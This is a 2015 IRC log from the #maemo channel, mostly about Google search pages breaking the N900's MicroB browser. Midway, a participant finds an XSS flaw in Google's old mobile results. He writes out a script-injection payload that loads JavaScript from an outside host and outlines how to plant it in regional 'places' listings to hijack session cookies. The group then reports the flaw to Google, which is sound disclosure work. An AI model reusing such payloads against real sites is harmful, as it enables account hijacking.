IRC log of #maemo for Saturday, 2015-12-19

*** freemangordon has joined #maemo  00:20
*** darkschneider has quit IRC  00:23
*** darkschneider has joined #maemo  00:23
*** futpib has quit IRC  00:37
*** auenfx4 has quit IRC  00:37
*** auenfx4 has joined #maemo  00:38
*** andril has quit IRC  00:41
*** florian has joined #maemo  00:46
*** sunshavi has joined #maemo  00:56
*** sunshavi has quit IRC  01:21
*** florian has quit IRC  02:16
*** pozitron has quit IRC  02:28
*** animist has joined #maemo  02:36
*** ceene has quit IRC  02:39
*** ceene has joined #maemo  02:39
*** xorly has quit IRC  02:48
<jonwil> looks like I have no solution to my Google problem unless I can find someone who understands the internals of libexpat...  02:48
<jonwil> or convince the largest index of information on the planet to stop returning web pages that fail in an obsolete browser for a device that is now 7 years old  02:52
*** drathir has joined #maemo  02:53
*** animist has left #maemo  02:55
<protem> is there a sip solution on maemo that supports a socks5 proxy?  03:11
<ds3> just ignore google  03:25
<ds3> they just return garbage anyways  03:25
*** drathir has quit IRC  03:32
<jonwil> I would be lost without Google  03:38
<jonwil> They return very useful results 99% of the time  03:38
*** eijk_ has quit IRC  03:44
<jonwil> looks like the hack I found seems to work and Google does good things again. Who knows what else might fail but hey, if I discover things failing I have all the right deb files on my phone to easily install if I need to  04:07
*** Humpelstilzchen has joined #maemo  04:56
*** eMHa has joined #maemo  04:57
*** Defiant has quit IRC  04:59
*** eMHa__ has quit IRC  05:01
*** jonwil has quit IRC  05:31
*** robbiethe1st has joined #maemo  05:53
*** jonwil has joined #maemo  05:58
*** DocScrutinizer05 has quit IRC  06:19
*** DocScrutinizer05 has joined #maemo  06:19
*** povbot has joined #maemo  06:44
*** sparetire_ has quit IRC  06:57
<ds3> donno what you are searching but they return garbage 99% of the time  07:21
<ds3> just randomly dropping terms to return "results"  07:21
*** drathir has joined #maemo  07:28
*** drathir has quit IRC  08:00
*** RST38h has quit IRC  08:15
<jonwil> The trick is to know how to use Google properly  08:18
<jonwil> and what the right search terms are  08:18
<jonwil> Its the largest collection of information ever collected, its logical to expect that there are times when it might not return exactly the right result and you need to further narrow it down  08:20
*** protem has quit IRC  08:23
*** krnlyng has quit IRC  08:23
<ds3> that is a waste of time. they didn't use to do that  08:24
*** robbiethe1st has quit IRC  08:31
*** drathir has joined #maemo  08:36
*** krnlyng has joined #maemo  08:37
*** jonwil has quit IRC  08:57
<KotCzarny> yeah, searching for the right term is the key to getting good results, but a 'good enough search term' is also very good with google, which differentiates it from most of the other search engines  09:01
<KotCzarny> what i dislike with google is that they changed the algo somehow and now it returns results with a long delay  09:01
<KotCzarny> also, adding the 'google fix' extension fixed another delay where they send the click to google first before going to the clicked link target  09:03
*** jonwil has joined #maemo  09:18
*** Roth has joined #maemo  09:18
*** jonwil has quit IRC  09:26
*** jonwil has joined #maemo  09:35
<jonwil> http://talk.maemo.org/showthread.php?p=1492095#post1492095  10:02
*** chfoo has quit IRC  10:03
<jonwil> freemangordon: ping  10:03
<jonwil> ~seen pali  10:03
<jonwil> damn bot  10:03
<jonwil> :P  10:03
<jonwil> merlin1991: ping  10:03
<KotCzarny> shouldnt it be sent to google.com and not maemo?  10:03
<KotCzarny> povbot: seen pali  10:04
<povbot> KotCzarny: pali was last seen in #maemo 3 days, 10 hours, 48 minutes, and 57 seconds ago: <Pali> because we are adding unused link dependences  10:04
<KotCzarny> use povbot for seens  10:04
<jonwil> Its google returning invalid output but we would need to A. Find a way to contact the right part of Google (I cant find any such contacts) B. Get them to care about fixing an issue that affects an ancient (in internet terms) no-longer-supported dead browser (unlikely given that they have already dropped support for the relevant Firefox versions that microb-engine comes from) and C. Get them to...  10:07
<jonwil> ...then actually make the necessary fix to what output they return (also hard since any change they make to their output has consequences for other browsers too and would need a lot of testing and stuff)  10:07
<jonwil> hence why I am suggesting a workaround in microb might be the only solution  10:07
*** heroux has quit IRC  10:23
*** florian has joined #maemo  10:23
*** florian has quit IRC  10:36
*** krnlyng has quit IRC  10:38
*** futpib has joined #maemo  10:50
*** heroux has joined #maemo  10:51
*** krnlyng has joined #maemo  10:51
<freemangordon> jonwil: pong  10:52
<jonwil> FYI, I am going away for xmas (leaving tomorrow afternoon) and wont be on IRC (or doing any dev stuff). I get back about a week later.  10:53
<KotCzarny> poor you  10:53
<jonwil> it will be fun :)  10:54
<freemangordon> ok  10:54
<jonwil> lots of cool stuff planned :)  10:54
<KotCzarny> :)  10:54
<jonwil> also if you have any comments on my microb post, that would be great  10:54
<jonwil> would be good to see what the best solution is...  10:55
*** vectis3 has quit IRC  11:02
<freemangordon> jonwil: I don't really like the idea to tweak microb outside of the standards just to please google  11:11
<Maxdamantus> I suspect Google would fix it if the relevant people were made aware of it.  11:21
<jonwil> Yes I am sure, we just need to find the right people at Google  11:21
<jonwil> which seems to be hard  11:21
<jonwil> I cant find any contacts for the Google Search Engine people  11:21
<Maxdamantus> https://www.google.com/appserve/security-bugs/m2/new?rl=&key=  11:23
<Maxdamantus> I'd call that an XSS bug.  11:23
*** Roth has quit IRC  11:25
<Maxdamantus> Possible XSS bug, content passed unescaped into HTML document.  11:27
<Maxdamantus> Simple, correct.  11:27
* Maxdamantus would do it himself if he knew the URL involved etc  11:27
*** troulouliou_div2 has joined #maemo  11:29
<Maxdamantus> All you need to do to use it to do actual XSS is create a page somewhere with a title like <script src="//bit.ly/aeaoe"/>  11:31
<Maxdamantus> then get Google to index it such that you can consistently search for it, then get people to load the URL that produces that document in an iframe.  11:31
<jonwil> I wouldn't call it a security bug  11:35
<Maxdamantus> Why not?  11:36
<Maxdamantus> XSS is a security bug. It's one of the things listed right there.  11:37
<Maxdamantus> “I want to report a technical security bug in a Google product (SQLi, XSS, etc.).”  11:37
<Maxdamantus> unescaped content in HTML = XSS  11:38
<Maxdamantus> Try searching for something like `script src`  11:38
<Maxdamantus> See what the produced XML looks like.  11:38
<Maxdamantus> I suspect it'll directly have <script src=""> in it.  11:39
<Maxdamantus> because that's in the title of some stackoverflow posts.  11:39
<jonwil> I see no way to exploit this particular issue  11:39
<Maxdamantus> What's the URL?  11:39
* Maxdamantus will see if he can load microb still.  11:39
<jonwil> Firstly different people will get a different set of results back for the same search based on what Google decides to return for a given search  11:39
<jonwil> i.e. what you get back when you search for a given term wont be the same as what I get back  11:40
<Maxdamantus> It will if it's a fairly unique search.  11:40
<jonwil> the ones its triggering on for me are fairly common  11:40
<Maxdamantus> Try searching for "maxdamantus temahia"  11:40
<Maxdamantus> I suspect you'll get one result, linking to some log from this chat.  11:40
<Maxdamantus> You're not trying to do XSS.  11:40
<Maxdamantus> If you try to do XSS you will try to come up with your own unique searches.  11:41
<Maxdamantus> You're just stumbling across the bug and it's making your browser fail.  11:41
<Maxdamantus> You're not the result of a targeted attack. A targeted attack is probably possible with the bug though.  11:41
<jonwil> To exploit this you would need to find a way to get a web page (with a hand-crafted title of your choice) such that it appears in the "places" section when you search on a Nokia N900 for a specific search term (and does so reliably for many people in many places)  11:42
<jonwil> Which would be highly unlikely given that Google will only ever show you places local to whatever it thinks your position is  11:42
<Maxdamantus> What's the URL?  11:43
<jonwil> even for a unique term  11:43
<jonwil> there is no URL as such, its searching with microb for specific search terms that happen to trigger the bug  11:43
<jonwil> in my case searching for fish and chips triggers it  11:43
<Maxdamantus> Yes, what's a URL?  11:43
<jonwil> because the "places" results include the & symbol  11:43
<Maxdamantus> I don't care about the term itself.  11:43
<Maxdamantus> I just want to know the form of URL that has the obvious bug in it.  11:44
<jonwil> The URL means nothing since the page you get back will be totally different for every browser, location etc.  11:44
<Maxdamantus> The URL points to a page with a bug in it.  11:44
<jonwil> and in fact there is nothing special about the URL  11:44
<Maxdamantus> What is the URL?  11:44
<Maxdamantus> I don't care if it's triggered or not for me.  11:45
<Maxdamantus> I just want to know a URL.  11:45
<jonwil> there is no special URL, its the normal google search  11:45
<jonwil> any google search via any url will fail on microb if it returns the right results  11:46
<Maxdamantus> So something like this? https://www.google.co.nz/search?q=foo  11:46
<jonwil> yeah anything will do it  11:46
<jonwil> it has to return results with a "places" section and that section needs to contain a result with an & in the title  11:47
<jonwil> but like I said unless you can guarantee that where Google thinks your target is located is in the right place to return your handcrafted "places" result, you cant use this for an exploit. Google wont return a "places" result for a location in New York (for example) to someone in London no matter what search term they use.  11:50
<Maxdamantus> You can probably just tell them to use the term "fish chips"  11:50
<Maxdamantus> It happens for me too.  11:50
<Maxdamantus> and I suspect you're in the country next to mine.  11:50
<jonwil> Yes I am in Australia :)  11:51
<jonwil> but it wont happen for everyone and you wont get the ability to control which results it displays  11:51
<jonwil> If someone searches for fish and chips and they dont get a result with an & in the name, it wont fail  11:51
<Maxdamantus> But that seems unlikely.  11:51
<jonwil> even if you can be fairly sure it will trigger, its not usable as an exploit since you have no control over the output (at best you can make microb spit out a parser error)  11:52
*** Pali has joined #maemo  11:53
<KotCzarny> jonwil: unlikely != unexploitable  11:53
<KotCzarny> remember, all bugs are initially hidden because they dont show right away  11:54
<jonwil> I dont deny its a bug  11:54
<KotCzarny> and 'its unlikely, so it doesnt matter' is a sure way to make your product unsecure  11:54
<jonwil> but its not an exploit if you the attacker have no way to control what, if any, bogus invalid content the user sees  11:54
<KotCzarny> jonwil, also, if YOU cant think of a way to exploit it, doesnt mean SOMEONE ELSE cant think of a way  11:55
<KotCzarny> sometimes its a chain of bugs to do an exploit  11:55
<Maxdamantus> jonwil: so it's exploitable in certain areas .. that's exploitable.  11:55
<KotCzarny> that's why it's important to patch even 'unlikely' bugs  11:55
<Maxdamantus> I'm pretty sure it's not hard to get Google to know about new "places".  11:56
<Maxdamantus> and the class of bug is XSS.  11:56
<jonwil> The only side effect of the bug is a weird client-side microb parser error, how is that usable for exploiting  11:56
<Maxdamantus> content is injected into HTML unescaped.  11:56
<KotCzarny> url string can be treated as js variable input?  11:56
<Maxdamantus> That's the side-effect when a place happens to have an ampersand in it that's not part of an HTML escape sequence.  11:57
<Maxdamantus> That's the side-effect you're most likely to stumble across when you're not the subject of an attack.  11:57
<Maxdamantus> When you're subject to an attack, the side-effect will be the page will be parsed fine, but it'll inject someone else's JavaScript onto a page owned by Google.  11:58
<Maxdamantus> which is extremely bad.  11:58
<Maxdamantus> if your browser happens to be logged on to Google, someone else can hijack your session cookies and mess around as you on your Google account.  11:59
<jonwil> The trick is finding something which, when inserted into the text between a <a> and a </a> tag will cause the browser not to fail on parsing it but will instead do something dangerous  12:00
<Maxdamantus> https://gist.githubusercontent.com/Maxdamantus/fb3f4252e9b9d21798cd/raw/025026518fde653d44c89f8f724974e361ecc9d9/gistfile1.txt  12:02
<Maxdamantus> ie, exactly what I said.  12:02
<Maxdamantus> <script src="//maxdamantus.eu.org/e.js"/>  12:02
<Maxdamantus> That's perfectly acceptable between <a> and </a> tags  12:03
<Maxdamantus> and if it does appear there, it'll load some weird JS that in this case happens to make all the elements bounce around the screen flashing random colours.  12:03
<Maxdamantus> I'll report it.  12:04
<jonwil> yeah true, we have no way to know if its just the one case of the bogus & sign  12:04
<jonwil> I will report it since I know the details  12:04
<Maxdamantus> I know the details now too.  12:04
<Maxdamantus> If you do it, you should probably include the first part of that curl command I posted.  12:05
<Maxdamantus> since I can use that to make the request that gets the invalid response from my other machine.  12:05
<jonwil> Ok if you know the details, you fill in the report  12:05
<Maxdamantus> Okay.  12:05
<jonwil> especially since you will probably be in a better position to provide follow up with Google than I will (being that I will be away for a while)  12:06
<Maxdamantus> I'll also be away starting in a few days, but it's okay.  12:08
<jonwil> Oh and please keep http://talk.maemo.org/showthread.php?p=1492095#post1492095 up with the details (i.e. your report to Google and anything Google responds with)  12:08
<jonwil> I will probably be in a position to follow t.m.o (via my phone) on my holiday  12:10
<jonwil> I just wont have any access to IRC  12:10
<jonwil> or to anything dev environment etc  12:10
<jonwil> oh and thinking about it, even if its not exploitable, the fact that its "unescaped content being put into a web page" means it can at least be called a security bug and can therefore be submitted to Google via that form and will probably actually reach the inbox of someone with the power to look into it  12:12
<jonwil> btw Maxdamantus, dont forget to include details of how to reproduce it (an easy way to reproduce it even without needing microb and a N900 is to use a current Gecko based browser, a user-agent switcher and the N900 user agent)  12:16
<jonwil> That will get it to return the same content as on the N900  12:16
<Maxdamantus> Yes. I'm about to figure out a minimal reduction of the user agent required.  12:16
<jonwil> Being able to reproduce it with a browser that Google developers probably already test against/have locally with just a custom user-agent should make fixing it much easier than if they have to go "what the hell is microb and why should we care"  12:17
*** shentey has joined #maemo  12:18
<Maxdamantus> it reports an error in Chrome too (using a UA that triggers the old search page)  12:21
<Maxdamantus> well, Chromium.  12:21
*** Pali has quit IRC  12:25
*** darkschneider has quit IRC  12:26
*** darkschneider has joined #maemo  12:26
*** krnlyng has quit IRC  12:27
<jonwil> that's good, it shows 100% that its Google returning bogus content to any browser responding with that user agent (and if by some miracle there is a browser being triggered by the same user-agent check that somehow needs the content the way Google is currently sending it, Google will have that info and can find a way to differentiate between that one and the ones that break)  12:30
*** shentey has quit IRC  12:35
*** shentey has joined #maemo  12:37
<Maxdamantus> It's probably a problem simply with the old version of the site.  12:39
<Maxdamantus> You can also use the Nokia N9 UA included in Developer Tools to load it.  12:39
<jonwil> Developer Tools as in?  12:40
<jonwil> is that a Chrome feature?  12:40
<Maxdamantus> F12 in Chrome/Chromium  12:40
<jonwil> oh ok  12:40
*** krnlyng has joined #maemo  12:40
<jonwil> I dont use Chrome, I use SeaMonkey (Firefox derivative)  12:41
<jonwil> anyhow hopefully Google responds to your report and hopefully they fix the bug  12:41
<jonwil> and I dont need my hack patch to microb anymore :)  12:41
<Maxdamantus> also, you can specify locations.  12:41
<Maxdamantus> https://www.google.co.nz/search?near=Wellington&q=cafes  12:42
<Maxdamantus> so if you can get something malicious in a particular region you can target people generally using that bug.  12:42
<jonwil> didn't know that :)  12:45
<jonwil> anyhow lets hope Google will fix this bug in their mobile (or old-browser mobile) site  12:45
* Maxdamantus needs to create a business called <script src="//maxdamantus.eu.org/e.js"/> ltd.  12:48
*** troulouliou_div2 has quit IRC  12:52
<sixwheeledbeast> Use a different search engine?  12:53
<Maxdamantus> *2015 HOLIDAYS NOTICE*: During the last couple weeks of December, we might take a little bit longer to respond to you. That said, we will be working, and we'll give priority to all high severity reports. Thank you for your understanding.  12:53
<Maxdamantus> (this probably wouldn't be considered high-severity)  12:54
<jonwil> For now I have a hack fix to libexpat in microb that makes it work enough for searching  12:55
<jonwil> but its obviously not the right fix  12:56
<jonwil> :)  12:56
<jonwil> hmmm, it might help if I actually printed out the pdf file from the airline with my ticket details on it, going to need that tomorrow :)  12:59
*** norayr has quit IRC  13:02
<jonwil> heh, my printer has been saying "out of black ink" for a while now and yet it still prints without fail. I bet its lying to me to get me to throw away perfectly good black ink.  13:04
<jonwil> Unless of course its printing black using the colored ink tank  13:04
<jonwil> ok, zzz time, got a lot to do tomorrow :)  13:06
<jonwil> cya  13:06
*** jonwil has quit IRC  13:06
*** chfoo has joined #maemo  13:28
*** pozitrono has joined #maemo  13:31
*** eijk_ has joined #maemo  13:32
*** shentey_ has joined #maemo  13:49
*** shentey has quit IRC  13:51
*** krnlyng has quit IRC  13:52
*** Vajb has quit IRC  13:53
*** Vajb has joined #maemo  13:54
*** shentey_ has quit IRC  13:55
*** shentey has joined #maemo  13:57
*** xorly has joined #maemo  13:58
*** krnlyng has joined #maemo  14:00
*** shentey has quit IRC  14:02
*** shentey has joined #maemo  14:08
*** pozitrono has quit IRC  14:13
*** eijk_ has quit IRC  14:32
*** eijk_ has joined #maemo  14:33
*** eijk_ has quit IRC  14:39
*** disco_stu_droid has joined #maemo  14:40
*** disco_stu has quit IRC  14:40
*** disco_stu_droid has quit IRC  14:44
*** disco_stu has joined #maemo  14:44
*** realitygaps has quit IRC  14:46
*** realitygaps has joined #maemo  14:47
*** realitygaps has quit IRC  14:58
*** realitygaps has joined #maemo  15:00
*** realitygaps has joined #maemo  15:00
*** krnlyng has quit IRC  15:25
*** shentey has quit IRC  15:30
*** Sicelo009N has joined #maemo  15:55
*** krnlyng has joined #maemo  16:00
*** l_bratch has quit IRC  16:08
*** xorly has quit IRC  16:14
*** vakkov_ is now known as vakkov  16:15
*** darkschneider has quit IRC  16:27
*** darkschneider has joined #maemo  16:27
*** woodong50 has joined #maemo  16:33
*** sunshavi has joined #maemo  16:58
*** norayr has joined #maemo  17:00
*** protem has joined #maemo  17:19
*** HRH_H_Crab has quit IRC  17:21
*** krnlyng has quit IRC  17:29
*** HRH_H_Crab has joined #maemo  17:39
*** sunshavi has quit IRC  17:39
*** krnlyng has joined #maemo  17:42
*** HRH_H_Crab has quit IRC  17:46
*** sparetire_ has joined #maemo  17:56
*** l_bratch has joined #maemo  18:03
*** l_bratch has quit IRC  18:04
*** HRH_H_Crab has joined #maemo  18:08
*** l_bratch has joined #maemo  18:11
*** krnlyng has quit IRC  18:28
*** vectis3 has joined #maemo  18:36
*** pozitron has joined #maemo  18:41
*** krnlyng has joined #maemo  18:41
*** xorly has joined #maemo  18:50
*** pozitron has quit IRC  18:51
<sixwheeledbeast> ~ping  18:53
*** vakkov has quit IRC  19:12
*** heroux has quit IRC  19:14
*** vakkov has joined #maemo  19:27
*** heroux has joined #maemo  19:31
*** krnlyng has quit IRC  19:31
*** Axel_H has joined #maemo  19:32
*** Axel_H_ has quit IRC  19:32
*** trumee has quit IRC  19:32
*** M-bobsummerwill has quit IRC  19:32
*** M-bobsummerwill1 has joined #maemo  19:32
*** LjL has quit IRC  19:33
*** xorly has quit IRC  19:33
*** shamus has quit IRC  19:34
*** LjL has joined #maemo  19:34
*** shamus has joined #maemo  19:34
*** norayr has quit IRC  19:36
*** norayr has joined #maemo  19:42
*** krnlyng has joined #maemo  19:45
*** Sicelo009N has quit IRC  19:47
*** Sicelo009N has joined #maemo  20:05
*** krnlyng has quit IRC  20:44
*** krnlyng has joined #maemo  21:02
*** vectis3 has quit IRC  21:04
*** Kabouik_ has quit IRC  21:11
*** Kabouik has joined #maemo  21:13
*** vectis3 has joined #maemo  21:18
*** peetah has quit IRC  21:18
*** Pali has joined #maemo  21:18
*** peetah has joined #maemo  21:19
*** Kabouik_ has joined #maemo  21:24
*** Kabouik has quit IRC  21:24
*** Pali has quit IRC  21:37
*** Pali has joined #maemo  21:38
*** Sicelo009N has quit IRC  21:49
*** Sicelo009N has joined #maemo  21:54
*** krnlyng has quit IRC  21:59
*** Roth has joined #maemo  22:06
*** pozitron has joined #maemo  22:12
*** krnlyng has joined #maemo  22:14
*** jonwil has joined #maemo  22:15
<jonwil> hi  22:16
<Pali> jonwil: hi  22:17
<jonwil> Not long now until my holiday. YAY :)  22:18
<Pali> jonwil: can you look at http://mg.pov.lt/maemo-ssu-irclog/#maemo-ssu.2015-12-15.log.html#t2015-12-15T23:35:57 ?  22:18
<jonwil> Freemangordon said he was going to do something about that I think  22:20
<jonwil> I dont have time to do anything about it, I have to finish getting ready for my holiday :)  22:28
*** xorly has joined #maemo  22:30
<jonwil> I will be away for about a week or so :)  22:37
<Pali> ok  22:39
*** peetah has quit IRC  22:50
*** peetah has joined #maemo  22:53
<jonwil> At least I have a (hack) fix for my problems with Google until such time as Google fixes their stuff :)  23:11
<freemangordon> Pali: I will make the appropriate -dev package as long as I have time  23:26
<Pali> ok  23:26
*** vakkov has quit IRC  23:33
*** florian has joined #maemo  23:37
*** vakkov has joined #maemo  23:37
*** Roth has quit IRC  23:50

Generated by irclog2html.py 2.15.1 by Marius Gedminas - find it at mg.pov.lt!